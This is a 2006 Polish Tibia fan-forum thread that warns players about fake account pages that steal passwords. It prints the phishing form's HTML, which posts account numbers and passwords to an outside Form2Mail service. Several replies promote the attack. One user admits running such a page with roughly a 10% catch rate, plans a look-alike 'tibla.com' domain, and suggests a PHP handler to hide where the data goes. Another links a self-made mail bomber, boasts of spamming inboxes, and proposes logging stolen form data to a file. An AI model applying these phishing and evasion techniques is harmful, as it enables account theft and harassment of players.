Tibia.pl - oficjalna fan strona

Maxxel · 12-04-2006, 19:44

Tak jak w temacie. Gracze (pseudo-hackerzy bo tak ich trzeba nazwać) robią strony wyglądające jak oficjalna strona Tibii (z polami na wpisanie account number'a i password'a - Strona wygląda jak "My account"). Strony te wabią ludzi tym że obiecują np: darmowy PACC na jakimś tam okres lub jakieś ekstra itemy (oczywiście wszystko za free bo, wystarczy tylko dać swoje passy i kliknąć na przycisk "Submit"). Lecz sprawa wygląda mniej kolorowo ponieważ gdy się kliknie na "Submit" twoje passy zamiast na tibia.com lecą na prywatne konto e-mail założyciela strony. Oczywiście mądżejszy gracz sprawdzi kod źródłowy tej strony i znajdzie linijkę z adresem na który są wysyłane jego passy. Ale ci "hackerzy" zabezpieczają sie przed tym stosując "ramki" na stronach (kto trochę kuma HTML'a to wie o co chodzi

) przez co sprawdzając kod źródłowy sprawdzamy z jakich innych stron składa się ta strona (i niemozemy sprawdzić kodu źródłowego strony która nas interesuje). Oczywiście można to obejść

:

Podam przykład z Mozilli Forefox (bo IE nie używam) :

- klikamy na stronie prawym przyciskiem myszy i wysuwa nam się menu podręczne
- z menu wybieramy Ramka>Pokaż tylko ramkę lub Pokaż źródło ramki

i znajdujemy tam takie linijki kodu :

<form method="POST" action="http://free4web.pl/Form2Mail/">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="zwrtadr" value="http://tibia.4players.de/home/?subtopic=account">
<TABLE BORDER=0 CELLPADDING=1>
<TR><TD>Number: </TD><TD><INPUT TYPE=password name="ID" SIZE=10 MAXLENGTH=10></TD></TR>

<TR><TD>Password: </TD><TD><INPUT TYPE=password NAME="pass" SIZE=29 MAXLENGTH=29></TD></TR>
</TABLE>

"[email protected]" to adres na które wysyłane są passy gościa który się nabrał

Kubon · 12-04-2006, 19:48

Taak ten temat dobry, ale te linki....
Jakis (powiedzmy) niedoswiadczony gracz moze tam wejsc bez czytania topicu. I co wtedy??

Maxxel · 12-04-2006, 19:50

Cytuj:

Oryginalnie napisane przez Kubon

Taak ten temat dobry, ale te linki....
Jakis (powiedzmy) niedoswiadczony gracz moze tam wejsc bez czytania topicu. I co wtedy??

Hack

bo trzeba było czytać

Gustek · 12-04-2006, 19:59

@topic
GZ za pomysł! Niech ludzie się uświadomią... mnie już raz hack spotkał (nie wiem jak bo na takie strny nie wchodziłem x/) i nie życzę tego nikomu innemu.

@Kubon
To niech się nauczą czytać

Vanzi · 12-04-2006, 20:05

Podając adresy powinieneś to robić tak, aby po kliknięciu na niego otwierała się jakaś bezpieczna strona... bo jeszcze ktoś kliknie, zapomni się i zaloguje sie ^.-

Rybzor · 12-04-2006, 20:05

Wogule nie podawaj przykladowych stron...

Pozatym jest setka tysięcy poradnikow na ten temat;/, no ale o takim sposobie malo kto wspomina, watpie zeby ktos tak sprawdzal, ale moze sie komus przyda

Maxxel · 12-04-2006, 20:40

OK poprawiłem te linki żeby nikt tam nie wszedł i się nie lognoł. Ale powiedzcie czy osoba która wchodzi na forum którego wogóle nieczyta tylko szuka linków żeby na nie wejść nieklasyfikuje się do grona noobów? Ja myślę że tak i myślę też że będzie miał/ła nauczkę za nieczytanie postów

.

Raul · 12-04-2006, 21:03

Bez żadnych linków ani adresów do tego typu stron proszę.

prywek · 12-04-2006, 21:21

podaj jescze link do mailbombera i juz bedzie git

dargot · 12-04-2006, 21:40

sprawa wyglada jano wystarczy 10 min zeby wejsci na jego poczte !

wrot3k · 12-04-2006, 22:10

Prywek - http://rapidshare.de/files/17351143/uhm*********** mówisz i masz xD Mail bomber własnej roboty.

Btw, coś podobnego chciałem napisać

Ale bardziej polecam zrobienie spamu przez wypelnianie X razy tej ankiety, gdyz pozostajemy anonimowi. Osobiscie juz zapchalem tak kilka kont mailowych wiadomosciami typu "nooob noob noob!!!"

Avager · 12-04-2006, 23:07

Heh, osobiście sam mam taką pseudo stronke ;p ,
I powiedzieć moge że na 100 osób nabiera się średnio 10 ... więc to dość dużo (lvle 8-40).

A co do tego że znajdziesz tam w kodzie źródłowym....jeśli jednak jest inna domena (przed tym zanim dojdzie sie do HOST'a). W źródle będzie podany link z domeny do hosta nastepnie trzeba w ten link wejsc, i masz zrodlo gotowe, znajdujesz maila i gotowe.
JEst jednak ale... PHP :>

<form method="POST" action="mail.php">

szybko, czysto i bezpiecznie :>
Chyba ze ktos znajdzie mail.php ... ale watpie...jesli zastrzeszesz go haslem.. .

Pacek · 12-04-2006, 23:11

temat taki sobie recepta na to żeby nikt sie nie włamał na nasze konto jest o wiele prostsza. Nie wchodzić na nic innego tylko na tibie.com, nie ściągać niczego i nie używać dziwnych programów. 100% ze "hacka" nie będzie
ps. podoba mi sie stwierdzenie "ja ustrzec sie od hacka na konto" chyba każdy mi przyzna że sformułowane dość niefortunnie, rozbawiło mnie to [; 3maj sie

Avager · 12-04-2006, 23:32

up:

Wiesz...

www.tibla.com/forum/?subtopic~cos tam cos tam

jak to szybko czytasz to sie nabierzesz

) (to tylko przyklad... planuje podobna domene wykupic

).

wrot3k · 12-04-2006, 23:42

Imo fake'i na maila sa denne, lepiej zrobic prosty skrypcik w php ktory dodaje dane z formularza do jakiegos pliku txt.

Nikast Shynix · 12-04-2006, 23:52

czy mi sie wydaje, czy takich tematów było dość sporo?

Avager · 13-04-2006, 00:46

Wydaje Ci sie.

12-04-2006, 19:44	#1
Maxxel Użytkownik forum Data dołączenia: 05 03 2006 Posty: 27	www.podajswojepassy.pl - czyli jak ustrzec się od hacka na konto !!! Tak jak w temacie. Gracze (pseudo-hackerzy bo tak ich trzeba nazwać) robią strony wyglądające jak oficjalna strona Tibii (z polami na wpisanie account number'a i password'a - Strona wygląda jak "My account"). Strony te wabią ludzi tym że obiecują np: darmowy PACC na jakimś tam okres lub jakieś ekstra itemy (oczywiście wszystko za free bo, wystarczy tylko dać swoje passy i kliknąć na przycisk "Submit"). Lecz sprawa wygląda mniej kolorowo ponieważ gdy się kliknie na "Submit" twoje passy zamiast na tibia.com lecą na prywatne konto e-mail założyciela strony. Oczywiście mądżejszy gracz sprawdzi kod źródłowy tej strony i znajdzie linijkę z adresem na który są wysyłane jego passy. Ale ci "hackerzy" zabezpieczają sie przed tym stosując "ramki" na stronach (kto trochę kuma HTML'a to wie o co chodzi ) przez co sprawdzając kod źródłowy sprawdzamy z jakich innych stron składa się ta strona (i niemozemy sprawdzić kodu źródłowego strony która nas interesuje). Oczywiście można to obejść : Podam przykład z Mozilli Forefox (bo IE nie używam) : - klikamy na stronie prawym przyciskiem myszy i wysuwa nam się menu podręczne - z menu wybieramy Ramka>Pokaż tylko ramkę lub Pokaż źródło ramki i znajdujemy tam takie linijki kodu : <form method="POST" action="http://free4web.pl/Form2Mail/"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="zwrtadr" value="http://tibia.4players.de/home/?subtopic=account"> <TABLE BORDER=0 CELLPADDING=1> <TR><TD>Number: </TD><TD><INPUT TYPE=password name="ID" SIZE=10 MAXLENGTH=10></TD></TR> <TR><TD>Password: </TD><TD><INPUT TYPE=password NAME="pass" SIZE=29 MAXLENGTH=29></TD></TR> </TABLE> "[email protected]" to adres na które wysyłane są passy gościa który się nabrał Ostatnio edytowany przez Raul - 12-04-2006 o 21:01.

12-04-2006, 19:48	#2
Kubon Użytkownik Forum Data dołączenia: 14 04 2005 Lokacja: Lublin Wiek: 33 Posty: 448 Stan: Na Emeryturze	Taak ten temat dobry, ale te linki.... Jakis (powiedzmy) niedoswiadczony gracz moze tam wejsc bez czytania topicu. I co wtedy?? __________________

12-04-2006, 19:59	#4
Gustek Użytkownik Forum Data dołączenia: 15 06 2005 Lokacja: Wawa Wiek: 34 Posty: 330 Stan: Aktywny Gracz Profesja: Elder Druid Świat: obsidia Poziom: 9x	@topic GZ za pomysł! Niech ludzie się uświadomią... mnie już raz hack spotkał (nie wiem jak bo na takie strny nie wchodziłem x/) i nie życzę tego nikomu innemu. @Kubon To niech się nauczą czytać __________________ ===> Only Obsidia - najlepsze fotki na forum ^^ <=== Ostatnio edytowany przez Raul - 12-04-2006 o 21:02.

12-04-2006, 20:05	#5
Vanzi Użytkownik Forum Data dołączenia: 21 12 2005 Lokacja: Wrocław Posty: 165 Świat: WoWscape	Podając adresy powinieneś to robić tak, aby po kliknięciu na niego otwierała się jakaś bezpieczna strona... bo jeszcze ktoś kliknie, zapomni się i zaloguje sie ^.- Ostatnio edytowany przez Raul - 12-04-2006 o 21:02.

12-04-2006, 21:03	#8
Raul eX Moderator Data dołączenia: 14 03 2004 Lokacja: Estadio Santiago Bernabéu Posty: 2,197	Bez żadnych linków ani adresów do tego typu stron proszę. __________________ De las glorias deportivas que campean por España, Va el Madrid con su bandera, limpia y blanca que no empaña. Club castizo y generoso, todo nervio y corazón, Veteranos y noveles, veteranos y noveles, Miran siempre sus laureles con respeto y emoción. ¡Hala Madrid! ¡Hala Madrid!

12-04-2006, 20:05	#6
Rybzor CS Tibia.pl Team Data dołączenia: 06 09 1970 Lokacja: Gliwice Wiek: 34 Wpisy bloga: 1 Posty: 8,453 Stan: Początkujący	Wogule nie podawaj przykladowych stron... Pozatym jest setka tysięcy poradnikow na ten temat;/, no ale o takim sposobie malo kto wspomina, watpie zeby ktos tak sprawdzal, ale moze sie komus przyda

12-04-2006, 20:40	#7
Maxxel Użytkownik forum Data dołączenia: 05 03 2006 Posty: 27	OK poprawiłem te linki żeby nikt tam nie wszedł i się nie lognoł. Ale powiedzcie czy osoba która wchodzi na forum którego wogóle nieczyta tylko szuka linków żeby na nie wejść nieklasyfikuje się do grona noobów? Ja myślę że tak i myślę też że będzie miał/ła nauczkę za nieczytanie postów .

12-04-2006, 21:21	#9
prywek Użytkownik Forum Data dołączenia: 08 08 2005 Wiek: 37 Posty: 41	podaj jescze link do mailbombera i juz bedzie git Ostatnio edytowany przez prywek - 12-04-2006 o 21:22.

12-04-2006, 21:40	#10
dargot Użytkownik forum Data dołączenia: 05 03 2006 Posty: 11 Stan: Aktywny Gracz Imię: Dargot oF Haz Profesja: Knight Świat: Neptera Poziom: +20 Skille: 53/53 Poziom mag.: 3	sprawa wyglada jano wystarczy 10 min zeby wejsci na jego poczte !

12-04-2006, 22:10	#11
wrot3k Użytkownik forum Data dołączenia: 12 04 2006 Lokacja: Gdańsk Posty: 3 Stan: Aktywny gracz Imię: Miszcz Wrotek Profesja: Elder Druid Gildia: --- Świat: Antica Poziom: 32 Poziom mag.: 37	Prywek - http://rapidshare.de/files/17351143/uhm*********** mówisz i masz xD Mail bomber własnej roboty. Btw, coś podobnego chciałem napisać Ale bardziej polecam zrobienie spamu przez wypelnianie X razy tej ankiety, gdyz pozostajemy anonimowi. Osobiscie juz zapchalem tak kilka kont mailowych wiadomosciami typu "nooob noob noob!!!"

12-04-2006, 23:07	#12
Avager Użytkownik Forum Data dołączenia: 11 11 2004 Lokacja: Opole Wiek: 35 Posty: 2,396	Heh, osobiście sam mam taką pseudo stronke ;p , I powiedzieć moge że na 100 osób nabiera się średnio 10 ... więc to dość dużo (lvle 8-40). A co do tego że znajdziesz tam w kodzie źródłowym....jeśli jednak jest inna domena (przed tym zanim dojdzie sie do HOST'a). W źródle będzie podany link z domeny do hosta nastepnie trzeba w ten link wejsc, i masz zrodlo gotowe, znajdujesz maila i gotowe. JEst jednak ale... PHP :> <form method="POST" action="mail.php"> szybko, czysto i bezpiecznie :> Chyba ze ktos znajdzie mail.php ... ale watpie...jesli zastrzeszesz go haslem.. . Ostatnio edytowany przez Avager - 12-04-2006 o 23:10.

12-04-2006, 23:11	#13
Pacek Użytkownik Forum Data dołączenia: 18 07 2004 Lokacja: Bełchatów Wiek: 38 Posty: 603 Stan: Niegrający Imię: Pacek man Profesja: Brak (Rookgaard) Świat: Julera	temat taki sobie recepta na to żeby nikt sie nie włamał na nasze konto jest o wiele prostsza. Nie wchodzić na nic innego tylko na tibie.com, nie ściągać niczego i nie używać dziwnych programów. 100% ze "hacka" nie będzie ps. podoba mi sie stwierdzenie "ja ustrzec sie od hacka na konto" chyba każdy mi przyzna że sformułowane dość niefortunnie, rozbawiło mnie to [; 3maj sie __________________ "Czemu nas tam nie ma gdzie za darmo wszystko dają...." "płoń płoń płoń parlamęcie niech spali cię ogień na historii zakręcie"

12-04-2006, 23:32	#14
Avager Użytkownik Forum Data dołączenia: 11 11 2004 Lokacja: Opole Wiek: 35 Posty: 2,396	up: Wiesz... www.tibla.com/forum/?subtopic~cos tam cos tam jak to szybko czytasz to sie nabierzesz ) (to tylko przyklad... planuje podobna domene wykupic ).

12-04-2006, 23:42	#15
wrot3k Użytkownik forum Data dołączenia: 12 04 2006 Lokacja: Gdańsk Posty: 3 Stan: Aktywny gracz Imię: Miszcz Wrotek Profesja: Elder Druid Gildia: --- Świat: Antica Poziom: 32 Poziom mag.: 37	Imo fake'i na maila sa denne, lepiej zrobic prosty skrypcik w php ktory dodaje dane z formularza do jakiegos pliku txt.

12-04-2006, 23:52	#16
Nikast Shynix Użytkownik Forum Data dołączenia: 01 01 2006 Lokacja: Płock Posty: 646 Stan: Na Emeryturze	czy mi sie wydaje, czy takich tematów było dość sporo? __________________ Wpadłem na chwilę Ostatnio edytowany przez Nikast Shynix - 12-04-2006 o 23:54.

13-04-2006, 00:46	#17
Avager Użytkownik Forum Data dołączenia: 11 11 2004 Lokacja: Opole Wiek: 35 Posty: 2,396	Wydaje Ci sie.

Użytkowników czytających ten temat: 1 (zarejestrowanych: 0, gości: 1)

Tibia.pl - oficjalna fan strona

Jesteś tu: Tibia.pl / Forum